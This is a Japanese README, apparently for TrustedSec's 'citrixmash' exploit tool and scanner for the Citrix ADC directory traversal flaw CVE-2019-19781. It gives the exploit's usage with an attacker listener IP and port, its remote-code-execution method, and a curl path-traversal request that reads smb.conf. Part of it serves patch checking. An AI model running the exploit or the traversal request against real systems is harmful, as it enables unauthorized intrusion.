
これはCitrix ADC(NetScaler)の脆弱性のために公開されたツールです。他の人が先にエクスプロイトコードを公開したため、我々はこれを開示しているに過ぎません。
これは、他の研究者が先にコードを公開したため、アップロードされたものです。防御側がシステムにパッチを適用する十分な時間がある間、もう少し長く非公開にしておきたかったところです。
私たちは責任ある開示を支持していますが、今回は既に秘密が漏れてしまっていました。
エクスプロイト: CVE-2019-19781
root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py
Citrixmash v0.1 - Citrix ディレクトリトラバーサルバグ (CVE-2019-19781) を悪用します ツール作成者: Rob Simon および Dave Kennedy 貢献者: TrustedSec チーム ウェブサイト: https://www.trustedsec.com 情報: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ フォレンジックと IOC: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
このツールは、Citrix ADC (NetScaler) のディレクトリトラバーサルバグを悪用し、XML 形式でファイルを被害マシンに追加する Perl スクリプトを呼び出します。これにより、リモートコード実行が可能になります。
以下の 2 つのファイルの場所を必ずクリーンアップしてください: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
victimaddress と attackerip_listener フィールドでは、DNS ホスト名と IP アドレスの両方がサポートされていることに注意してください。
使用法:
python citrixmash.py <attackerip_listener> <attacker_port>
usage: citrixmash.py [-h] target targetport attackerip attackerport
これは、サーバーがまだ CVE-2019-19781 に対して脆弱かどうかを確認するための簡単なテストです。
使用法: python3 cve-2019-19781.py
注: CIDR 表記 (例: 192.168.1.1/24) やホスト名も使用できます。
結果は、サーバーが脆弱かどうかを示します。一度に 1 つのサーバーしかスキャンできません。
CVE-2019-19781-Scanner 会社: TrustedSec 作成者: Dave Kennedy これは、リモートシステムがまだ CVE-2019-19781 に対して脆弱かどうかを確認します。一度に 1 台のホストのみをスキャンします。 CIDR 表記も使用できます。例: 192.168.1.1/24 IP アドレスの代わりにホスト名を使用することもできます。 外部ツールで生成された IP アドレスを含むファイルを使用することもできます。
例: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 例2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 例3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 例4: python3 cve-2019-19781_scanner.py as15169 443 例5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose 例6: python3 cve-2019-19781_scanner.py file:hostfile 443
使用法: python3 cve-2019-19781_scanner.py targetip targetport
usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]
この脆弱性が緩和されているかどうかをテストしたい場合は、以下を使用してください:
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
または、非公開または内部のエンタープライズ CA を使用している場合は、--insecure オプションを使用して上書きできます。
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
403 が返された場合はパッチが適用されています。または、Citrix のウェブサイトが返され、smb.conf ファイル自体が返されない場合も同様です。
smb.conf が表示される場合は、脆弱な状態です。
必要なパッケージをインストールするには、以下のコマンドを実行する必要があります。
pip3 install -r requirements.txt